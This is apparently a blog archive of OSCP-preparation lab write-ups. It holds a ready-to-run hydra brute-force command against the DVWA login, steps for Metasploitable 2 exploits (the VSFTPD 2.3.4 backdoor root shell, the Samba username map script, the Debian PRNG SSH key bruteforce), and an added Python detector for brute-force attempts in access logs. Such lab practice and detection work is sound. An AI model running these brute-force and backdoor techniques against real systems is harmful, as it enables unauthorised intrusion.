Monday, September 14, 2015

DVWA brute force login with hydra

hydra <IP-Address> -l admin -P /root/scripts/recon_enum/wordlists/passlist http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=5b1c46ae203ccb0dcbf8fc3390e276d2"
Replace <IP-Address> with the target's IP address.

The username is "-l admin". Replace the username as necessary, and if you're using a user list, change the parameter to "-L /path/to/userlist.txt".

Change the PHPSESSID to one you capture with Wireshark, Burp, ZAP, etc. when you manually enter a login/password.

Notice that while the request URL is typically "/dvwa/vulnerabilities/brute/?username=user&password=pass&Login=Login", in hydra you need to specify "index.php" between "/brute/" and the "?", and you replace the "?" with ":".
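Added example (not from the original post): because this login form submits by GET, every username and password tried ends up in the web server's access log, which is what a defender can count. The script below assumes Apache combined-log format and uses constructed sample lines to flag clients that submit many credential pairs to the DVWA brute-force page inside a short window, and separates the one-user/many-passwords pattern of -l/-P from spraying.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real traffic): five rapid attempts, one lone attempt, one page view.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Sep/2015:10:00:00 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=123456&Login=Login HTTP/1.1" 200 1532
10.0.0.5 - - [14/Sep/2015:10:00:00 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=letmein&Login=Login HTTP/1.1" 200 1532
10.0.0.5 - - [14/Sep/2015:10:00:01 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=qwerty&Login=Login HTTP/1.1" 200 1532
10.0.0.5 - - [14/Sep/2015:10:00:01 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=password&Login=Login HTTP/1.1" 200 1532
10.0.0.5 - - [14/Sep/2015:10:00:02 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=admin&password=welcome1&Login=Login HTTP/1.1" 200 1532
10.0.0.9 - - [14/Sep/2015:10:00:30 +0000] "GET /dvwa/vulnerabilities/brute/index.php?username=gordonb&password=abc123&Login=Login HTTP/1.1" 200 1532
10.0.0.9 - - [14/Sep/2015:10:00:45 +0000] "GET /dvwa/index.php HTTP/1.1" 200 4210
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')
LOGIN_PATH = "/dvwa/vulnerabilities/brute/index.php"  # the page the hydra command above targets

def parse_line(line):
    # Parse one access-log line into ip/timestamp/path/credentials; None if malformed.
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    qs = parse_qs(url.query)
    return {"ip": m["ip"], "path": url.path,
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "user": qs.get("username", [None])[0],
            "password": qs.get("password", [None])[0]}

def find_bruteforce(log_text, window_s=60, threshold=5):
    """Return {ip: (attempts, distinct_users, distinct_passwords)} for each client that sent
    >= threshold credential pairs to LOGIN_PATH within any window_s-second window."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["path"] == LOGIN_PATH and ev["user"] is not None:
            by_ip[ev["ip"]].append(ev)
    hits = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(events)):  # sliding window over this client's attempts
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_s:
                start += 1
            win = events[start:end + 1]
            if len(win) >= threshold:
                hits[ip] = (len(win), len({e["user"] for e in win}), len({e["password"] for e in win}))
    return hits
```

A result of one distinct user and many distinct passwords is the -l admin -P wordlist pattern; many users with one password points at spraying instead.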

Wednesday, September 9, 2015

Metasploitable 2 Java RMI Server exploit

Metasploitable 2 Java RMI Server Insecure Default Configuration Java Code Execution
Vulnerability details: https://www.exploit-db.com/exploits/17535/

Samba username map script Command Execution

Command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" option: input containing shell metacharacters lets attackers execute arbitrary commands. No authentication is required to exploit this vulnerability!

Metasploitable2 Walkthrough without Metasploit - PHP 5.2.4 RCE

Exploiting Metasploitable2 Debian PRNG Bruteforce SSH

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

Port 22, SSH:
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit https://www.exploit-db.com/exploits/5720/

Note: I had to run this exploit multiple times before it found the right key. I found a blog post that gave Metasploitable2's root key that worked. That key was in the key directory, it works to login, but the exploit wasn't finding it. After some searching I read a blog post about pwnos by g0tM1lk that says sometimes it fails to find the key.

After running this exploit for the third time it finally finds the key and prints the command to run to ssh to Metasploitable2 as root without a password.

Exploiting Metasploitable2 without Metasploit - VSFTPD v2.3.4

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

On port 21, VSFTPD v2.3.4 is vulnerable to backdoor command execution.

End the username with a smiley ":)" and input any password and then connect to port 6200 for a root shell.